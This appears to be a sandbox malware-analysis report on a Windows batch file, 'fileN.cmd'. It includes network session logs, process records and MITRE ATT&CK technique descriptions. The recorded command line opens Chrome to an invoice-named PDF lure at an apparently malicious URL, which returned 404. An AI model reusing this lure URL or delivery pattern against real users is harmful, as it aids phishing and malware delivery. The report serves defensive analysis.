2024-05-23 19:06:51 UTC	341	OUT	GET /cgi/INVOICERVSHA.pdf HTTP/1.1 Host: s2r.tn Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-23 19:06:51 UTC	164	IN	HTTP/1.1 404 Not Found Date: Thu, 23 May 2024 19:06:51 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-05-23 19:06:51 UTC	315	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49711	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 19:06:55 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-05-23 19:06:55 UTC	467	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (chd/079C) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-eus2-z1 Cache-Control: public, max-age=43020 Date: Thu, 23 May 2024 19:06:55 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49712	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 19:06:56 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-05-23 19:06:56 UTC	514	IN	HTTP/1.1 200 OK ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=42972 Date: Thu, 23 May 2024 19:06:56 GMT Content-Length: 55 Connection: close X-CID: 2
2024-05-23 19:06:56 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49714	20.114.59.183	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 19:07:07 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=xDvV1b4DS8yY7Hh&MD=9xpw3R+4 HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-05-23 19:07:07 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 91b98085-d229-4db3-856a-2547d7293141 MS-RequestId: 98a51b7f-4dfc-4019-9bd6-b156abebf7f7 MS-CV: whSJKXyd60WLhO9L.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Thu, 23 May 2024 19:07:07 GMT Connection: close Content-Length: 24490
2024-05-23 19:07:07 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-05-23 19:07:07 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49720	20.114.59.183	443

Timestamp	Bytes transferred	Direction	Data
2024-05-23 19:07:45 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=xDvV1b4DS8yY7Hh&MD=9xpw3R+4 HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-05-23 19:07:46 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_1440" MS-CorrelationId: 1734a868-e9fd-4cca-b389-3229b2858f23 MS-RequestId: bbf077d7-c570-4b0b-8574-2c0d29807385 MS-CV: RW0Ye8B7YEOrzIT4.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Thu, 23 May 2024 19:07:45 GMT Connection: close Content-Length: 25457
2024-05-23 19:07:46 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92 Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
2024-05-23 19:07:46 UTC	9633	IN	Data Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: cmd.exePID: 5424, Parent PID: 4004

General

Target ID:	0
Start time:	15:06:46
Start date:	23/05/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\fileN.cmd" "
Imagebase:	0x7ff6d96c0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 3840, Parent PID: 5424

General

Target ID:	1
Start time:	15:06:46
Start date:	23/05/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 4136, Parent PID: 5424

General

Target ID:	4
Start time:	15:06:47
Start date:	23/05/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://s2r.tn/cgi/INVOICERVSHA.pdf
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 4092, Parent PID: 4136

General

Target ID:	6
Start time:	15:06:48
Start date:	23/05/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=2016,i,2758172289711227357,3117054335507487613,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Imagebase:	0x7ff684c40000
File size:	3'242'272 bytes
MD5 hash:	5BBFA6CBDF4C254EB368D534F9E23C92
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report fileN.cmd

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

Phishing

Compliance

Networking

System Summary

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Chrome Cache Entry: 47

Chrome Cache Entry: 48

Static File Info

General

File Icon

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: cmd.exePID: 5424, Parent PID: 4004

General

Chronological Activities

Analysis Process: conhost.exePID: 3840, Parent PID: 5424

General

Chronological Activities

Analysis Process: chrome.exePID: 4136, Parent PID: 5424

Windows Analysis Report
fileN.cmd